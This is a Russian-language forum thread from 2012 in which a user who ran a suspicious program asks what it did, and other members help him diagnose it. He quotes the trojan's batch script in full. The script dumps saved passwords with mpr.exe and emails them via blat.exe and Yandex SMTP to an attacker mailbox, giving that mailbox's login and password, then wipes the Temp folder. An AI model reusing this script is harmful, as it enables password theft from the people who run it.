Что делает этот троян?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Что делает этот троян? - 2012-05-07 01:39:23.570000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
Здравствуйте, я совершенно не разбирающийся в программировании человек, решил испытать судьбу(да и по дурости, что уж и говорить), и в первый раз запустил подозрительную программу собственноручно, без виртуальной машины. Ссылка на файл http://ifolder.ru/30336679 Вирустотал выдал вот что https://www.virustotal.com/file/269a638b853b65cb803b23f77ee6b17ebcf92a47677340f4a781225dc1d93bdc/analysis/1336337527/ Скачал Spybot, search and destroy, проверил систему Nod32 - ничего. Все время смотрю на процессы. Скачал PE Explorer, в resource editor увидел данный текст quote:
@echo off :start ping ya.ru -n 5 >nul if %errorlevel%==0 (goto send) else (goto end) :end goto :start :send blat.exe -install -server smtp.yandex.ru -port 587 -f trojan.gg@yandex.ru -u trojan.gg -pw 123321z mpr.exe /export ren *.mpf pass.mpf blat.exe -body PassReg -to trojan.gg@yandex.ru -attach pass.mpf del %Temp%\*.* /Q /S /F Также:quote:
blat.exe*115200*block_reader.sys*1920*HookLib.dll*43008*MPR.exe*3392512*mpr.ini*258*blat.dll*122880* Где-то было что-то наподобие 1.bat, больше ничего членораздельного не увидел. Кажется, это аттачмент он приложил? Способ передачи файла - скайп, понятно, что невозможно определить откуда. В момент запуска программы был открыт steam.exe и браузер Mozilla Firefox Aurora. Боюсь вырубить компьютер лишний раз. Вот, собственно и вопросы: что сделала эта программа моему компу? Какие пароли он украл? Могу ли я сейчас поменять все пароли? Что делать? Собственно, помогите, пожалуйста.
|
|
|
RE: Что делает этот троян? - 2012-05-07 08:01:02.636666
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
Что делает и что может сделать, сказать невозможно. Нужно дизассемблировать файлы blat.exe и mpr.exe. Но судя по всему, трой просто тащит у тебя пароли. Соединияется (проверяя соединение), потом тупо тащит все *.mpf, и шлёт на мыло trojan.gg@yandex.ru (пароль к ящику 123321z, там кстати ничего нет), и подчищает всё в папке Temp. Данный трой должно быть несложно прибить. Он в автозагрузке виден должен быть. Судя по тексту троя создатель себя особо не заморачивал. Вряд ли что-то крутое есть. Антивирусы на такое совсем и не должны реагировать. Всё в пределах разарешённого. Тут должен срабатывать файрволл, зарезая любую попытку соедениться и передать данные. А его, судя по всему у тебя нет. Как грохнуть трой? Давай лог AutoRuns ( http://technet.microsoft.com/ru-ru/sysinternals/bb963902 ), выложи на любой файлообменник, сюда ссылку. Посмотрим.
|
|
|
RE: Что делает этот троян? - 2012-05-07 09:27:11.800000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Такая поделка тащит пароли и обычно в автозапуск не записывается. blat.exe только отправляет письмо. mpr.exe - это multi password recovery, собирает пароли в файл pass.mpf. Батник все это хозяйство запускает, собственно он и представляет интерес, т.к. в нем записана почта и пароль кулхацкера.
|
|
|
RE: Что делает этот троян? - 2012-05-07 11:58:01.710000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
Логи Autoruns - http://ifolder.ru/30339730, Пароль - xaker В logon был файл rdpclip, это он?
|
|
|
RE: Что делает этот троян? - 2012-05-07 12:11:19.210000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
UpdReg Creative UpdReg Creative Technology Ltd. c:\windows\updreg.exe Bonjour Service Apple Inc. c:\program files\bonjour\mdnsresponder.exe отключите
|
|
|
RE: Что делает этот троян? - 2012-05-08 01:01:52.380000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
В общем, путем многих исследований я выявил, что этот троян одноразовый. Стырил ключ при запуске, отослал и все. Никаких отложенных задач. Странных процессов не нашел, дотошно исследовал каждый. Всем спасибо.
|
|
|
|
|